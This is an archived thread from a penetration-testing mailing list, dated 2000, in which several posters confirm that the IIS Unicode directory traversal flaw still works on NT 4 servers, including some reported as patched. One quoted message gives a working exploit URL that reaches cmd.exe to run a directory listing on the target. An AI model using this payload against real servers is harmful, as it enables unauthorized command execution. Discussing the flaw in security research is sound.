Penetration Testing mailing list archives
Re: [PEN-TEST] IIS UNICODE Strings
From: "Moonen, Ralph" <Moonen.Ralph () KPMG NL>
Date: Wed, 1 Nov 2000 14:24:09 +0100
I can confirm that this works on a system that is supposedly patched. Seems like there's somethin' strange going bump in the night.
-----Original Message----- From: Unicraft Systems [mailto:unicraft () OTERO CL] Sent: Wednesday, November 01, 2000 12:47 AM To: PEN-TEST () SECURITYFOCUS COM Subject: Re: [PEN-TEST] IIS UNICODE Strings --- Virus checked / op virussen gecontroleerd --- It works for me too!!! =) This was tested in an NT 4 SP6 server. Regards, DonSata -----Original Message----- From: Penetration Testers [mailto:PEN-TEST () SECURITYFOCUS COM]On Behalf Of Mike Ahern Sent: Tuesday, October 31, 2000 8:14 PM To: PEN-TEST () SECURITYFOCUS COM Subject: Re: [PEN-TEST] IIS UNICODE Strings Vitaly Osipov [vos () TELENOR CZ] wrote: Hmm... I see some *very* strange strings in you examples below... the second excaped symbol (%pc for example) is not real escaped hex-code -if it works, then the problem is not in Unicode at all, but in something else --------------------------- Trust Me, It Works!!! Which is interesting since at least one system reported as patched appears to be still vulnerable. I had assumed the admin either didn't patch, or used the wrong hotfix. Perhaps that is not the case... The Proof is in the Pudding: ---------------------------- http://10.X.X.X/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ Directory of c:\
********************************************************************** This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This footnote also confirms that this email message has been swept by MIMEsweeper for the presence of computer viruses. www.mimesweeper.com **********************************************************************
Current thread:
- Re: [PEN-TEST] IIS UNICODE Strings Marco (Nov 01)
- <Possible follow-ups>
- Re: [PEN-TEST] IIS UNICODE Strings Vitaly Osipov (Nov 01)
- Re: [PEN-TEST] IIS UNICODE Strings Mike Ahern (Nov 01)
- Re: [PEN-TEST] IIS UNICODE Strings Unicraft Systems (Nov 01)
- Re: [PEN-TEST] IIS UNICODE Strings Moonen, Ralph (Nov 02)
- Re: [PEN-TEST] IIS UNICODE Strings Mike Ahern (Nov 02)
- Re: [PEN-TEST] IIS UNICODE Strings Mike Ahern (Nov 02)